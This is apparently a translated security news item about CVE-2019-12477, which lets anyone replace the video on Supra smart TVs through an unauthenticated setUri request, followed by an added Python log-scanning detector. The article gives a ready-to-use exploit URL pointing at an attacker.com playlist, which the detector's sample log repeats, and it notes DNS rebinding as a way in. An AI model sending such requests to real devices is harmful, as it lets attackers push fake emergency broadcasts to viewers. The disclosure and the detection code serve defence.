Vulnerability in Supra smart TVs that allows displaying fake video

A vulnerability (CVE-2019-12477) has been identified in Supra Smart Cloud TVs that allows the program currently being watched to be replaced with attacker-supplied content. As an example, the display of a fake emergency warning is demonstrated.


For an attack, it is enough to send a specially crafted network request that does not require authentication. In particular, the "/remote/media_control?action=setUri&uri=" handler can be called with the URL of an m3u8 file containing the video parameters, for example "http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8".

In most cases, access to the TV's IP address is limited to the internal network, but because the request is sent over HTTP, techniques for reaching internal resources can be used when the user opens a specially crafted external page (for example, under the guise of an image request or using DNS rebinding).
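
Because the handler is a plain unauthenticated HTTP GET, calls to it are visible in proxy or gateway logs on the home or office network. The following detection sketch is an added example, not part of the original article; the log line format ("client method URL"), the function names and the sample lines are constructed assumptions.

```python
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not real traffic): "<client_ip> <method> <request URL>"
SAMPLE_LOG = """\
192.168.1.20 GET http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8
192.168.1.20 GET http://192.168.1.155/remote/media_control?action=setUri&uri=http://192.168.1.10/home_video.m3u8
192.168.1.31 GET http://192.168.1.155/index.html
192.168.1.31 GET http://192.168.1.155/remote/media_control?uri=http%3A%2F%2Fexample.net%2Fa.m3u8&action=setUri
"""

HANDLER_PATH = "/remote/media_control"  # handler named in the article


def is_internal_host(host):
    """True only for literal private, loopback or link-local IPs.
    Host names (and empty hosts) are treated as external, since they may
    resolve anywhere."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False
    return ip.is_private or ip.is_loopback or ip.is_link_local


def find_seturi_requests(log_text):
    """Return one finding per setUri call, marking media URLs hosted off-network."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue  # not in the assumed log format
        client, _method, url = parts
        req = urlsplit(url)
        if req.path.rstrip("/") != HANDLER_PATH:
            continue
        query = parse_qs(req.query)  # also decodes percent-encoded values
        # Case-insensitive match is a conservative assumption for detection.
        if "seturi" not in [a.lower() for a in query.get("action", [])]:
            continue
        for media_url in query.get("uri", []):
            host = urlsplit(media_url).hostname or ""
            findings.append({"client": client, "tv": req.hostname,
                             "media_url": media_url,
                             "external": not is_internal_host(host)})
    return findings


if __name__ == "__main__":
    for finding in find_seturi_requests(SAMPLE_LOG):
        print(finding)
```

Findings with "external" set are the ones that match the scenario in the article, where the TV is pointed at a playlist hosted outside the local network.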

Source: opennet.ru
